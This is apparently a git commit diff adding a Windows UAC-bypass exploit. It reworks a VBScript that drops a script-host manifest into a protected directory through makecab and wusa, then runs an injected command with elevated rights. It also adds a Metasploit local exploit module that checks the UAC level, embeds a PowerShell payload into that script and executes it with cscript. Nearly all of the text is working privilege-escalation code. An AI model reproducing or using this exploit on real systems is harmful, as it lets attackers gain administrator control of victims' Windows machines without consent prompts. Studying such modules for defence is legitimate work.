Initial working scripthost bypass uac
parent
129edd8b2e
commit
228087dced
|
@ -1,5 +1,7 @@
|
|||
Option Explicit
|
||||
|
||||
Dim oWs: Set oWs = CreateObject("WScript.Shell")
|
||||
Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
|
||||
Dim HOST_MANIFEST: HOST_MANIFEST = _
|
||||
"<?xml version=""1.0"" encoding=""UTF-8"" standalone=""yes""?>" & vbCrLf & _
|
||||
"<assembly xmlns=""urn:schemas-microsoft-com:asm.v1""" & vbCrLf & _
|
||||
|
@ -20,17 +22,8 @@ Dim HOST_MANIFEST: HOST_MANIFEST = _
|
|||
" </asmv3:application>" & vbCrLf & _
|
||||
"</assembly>"
|
||||
|
||||
Function CanBypass()
|
||||
Dim KEY_NAME: KEY_NAME = _
|
||||
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\" & _
|
||||
"Policies\System\ConsentPromptBehaviorAdmin"
|
||||
Dim oWs: Set oWs = CreateObject("WScript.Shell")
|
||||
CanBypass = Not CBool(oWs.RegRead(KEY_NAME) And 2)
|
||||
End Function
|
||||
|
||||
Sub Copy(ByVal sSource, ByVal sTarget)
|
||||
Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
|
||||
Dim oWs: Set oWs = CreateObject("WScript.Shell")
|
||||
Dim sTempFile: sTempFile = GetTempFilename()
|
||||
oWs.Run "makecab """ & sSource & """ """ & sTempFile & """", 0, True
|
||||
oWs.Run "wusa """ & sTempFile & """ /extract:" & sTarget, 0, True
|
||||
|
@ -39,16 +32,10 @@ End Sub
|
|||
|
||||
Sub Elevate()
|
||||
Const WINDIR = "%windir%"
|
||||
If Not CanBypass() Then
|
||||
Message "User will get warnings...", vbInformation
|
||||
' Exit Sub
|
||||
End If
|
||||
Dim oWs: Set oWs = CreateObject("WScript.Shell")
|
||||
Dim sPath: sPath = Left(WScript.ScriptFullName, _
|
||||
InStrRev(WScript.ScriptFullName, "\"))
|
||||
Dim sHost: sHost = Right(WScript.FullName, 11)
|
||||
Dim sManifest: sManifest = sPath & sHost & ".manifest"
|
||||
Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
|
||||
Dim oStream: Set oStream = oFso.CreateTextFile(sManifest)
|
||||
oStream.Write HOST_MANIFEST
|
||||
oStream.Close
|
||||
|
@ -60,38 +47,16 @@ End Sub
|
|||
|
||||
Function GetTempFilename()
|
||||
Const vbTemporaryFolder = 2
|
||||
Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
|
||||
Dim sTempFolder: sTempFolder = oFso.GetSpecialFolder(vbTemporaryFolder)
|
||||
GetTempFilename = oFso.BuildPath(sTempFolder, oFso.GetTempName())
|
||||
End Function
|
||||
|
||||
Function HasAdmin()
|
||||
Const VALUE = "RandomValue"
|
||||
Const KEYNAME = "HKLM\SOFTWARE\Microsoft\RandomKey"
|
||||
On Error Resume Next : Err.Clear
|
||||
Dim oWs: Set oWs = CreateObject("WScript.Shell")
|
||||
oWs.RegWrite KEYNAME, VALUE
|
||||
Call oWs.RegRead(KEYNAME)
|
||||
oWs.RegDelete KEYNAME
|
||||
HasAdmin = CBool(Err.Number = 0)
|
||||
End Function
|
||||
|
||||
Function Message(ByVal sMessage, ByVal iFlags)
|
||||
Message = MsgBox(sMessage, vbSystemModal Or iFlags, WScript.ScriptName)
|
||||
End Function
|
||||
|
||||
Sub RunAsAdmin()
|
||||
If HasAdmin() Then
|
||||
Message "Elevated to admin, ...", vbInformation
|
||||
Else
|
||||
Message "Failed... no admin", vbExclamation
|
||||
End If
|
||||
oWs.Run "COMMAND"
|
||||
End Sub
|
||||
|
||||
If WScript.Arguments.Named.Exists("RESTART") Then
|
||||
RunAsAdmin
|
||||
ElseIf HasAdmin() Then
|
||||
Message "U Wot M8? This is a elevation test and we're already admin!", vbCritical
|
||||
Else
|
||||
Elevate
|
||||
End If
|
|
@ -0,0 +1,141 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Exploit::FileDropper
|
||||
include Exploit::Powershell
|
||||
include Post::File
|
||||
include Post::Windows::Priv
|
||||
include Post::Windows::Runas
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)',
|
||||
'Description' => %q{
|
||||
This module will bypass Windows UAC by utilizing the missing .manifest on the script host
|
||||
cscript/wscript.exe binaries.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Vozzie',
|
||||
'Ben Campbell'
|
||||
],
|
||||
'Platform' => [ 'win' ],
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'Targets' => [
|
||||
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'References' => [
|
||||
[
|
||||
'URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html',
|
||||
'URL', 'https://github.com/Vozzie/uacscript'
|
||||
]
|
||||
],
|
||||
'DisclosureDate'=> 'Aug 22 2015'
|
||||
))
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Validate that we can actually do things before we bother
|
||||
# doing any more work
|
||||
validate_environment!
|
||||
check_permissions!
|
||||
|
||||
# get all required environment variables in one shot instead. This
|
||||
# is a better approach because we don't constantly make calls through
|
||||
# the session to get the variables.
|
||||
env_vars = get_envs('TEMP', 'WINDIR')
|
||||
|
||||
case get_uac_level
|
||||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
|
||||
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
|
||||
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
|
||||
fail_with(Failure::NotVulnerable,
|
||||
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
|
||||
)
|
||||
when UAC_DEFAULT
|
||||
print_good('UAC is set to Default')
|
||||
print_good('BypassUAC can bypass this setting, continuing...')
|
||||
when UAC_NO_PROMPT
|
||||
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
|
||||
shell_execute_exe
|
||||
return
|
||||
end
|
||||
|
||||
vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs"
|
||||
|
||||
upload_vbs(vbs_filepath)
|
||||
|
||||
cmd_exec("cscript.exe //B #{vbs_filepath}")
|
||||
end
|
||||
|
||||
def check_permissions!
|
||||
# Check if you are an admin
|
||||
vprint_status('Checking admin status...')
|
||||
admin_group = is_in_admin_group?
|
||||
|
||||
if admin_group.nil?
|
||||
print_error('Either whoami is not there or failed to execute')
|
||||
print_error('Continuing under assumption you already checked...')
|
||||
else
|
||||
if admin_group
|
||||
print_good('Part of Administrators group! Continuing...')
|
||||
else
|
||||
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
|
||||
end
|
||||
end
|
||||
|
||||
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
|
||||
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
|
||||
end
|
||||
end
|
||||
|
||||
def upload_vbs(payload_filepath)
|
||||
vbs = File.read(File.join(Msf::Config.data_directory,
|
||||
'exploits',
|
||||
'scripthost_uac_bypass',
|
||||
'bypass.vbs'))
|
||||
|
||||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
|
||||
|
||||
vbs.gsub!('COMMAND', command)
|
||||
print_status('Uploading the Payload VBS to the filesystem...')
|
||||
begin
|
||||
vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..")
|
||||
write_file(payload_filepath, vbs)
|
||||
register_file_for_cleanup(payload_filepath)
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
|
||||
def validate_environment!
|
||||
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
|
||||
|
||||
winver = sysinfo['OS']
|
||||
|
||||
case winver
|
||||
when /Windows (7|8|2008|2012)/
|
||||
print_good("#{winver} may be vulnerable.")
|
||||
else
|
||||
fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
|
||||
end
|
||||
|
||||
if is_uac_enabled?
|
||||
print_status('UAC is Enabled, checking level...')
|
||||
else
|
||||
unless is_in_admin_group?
|
||||
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue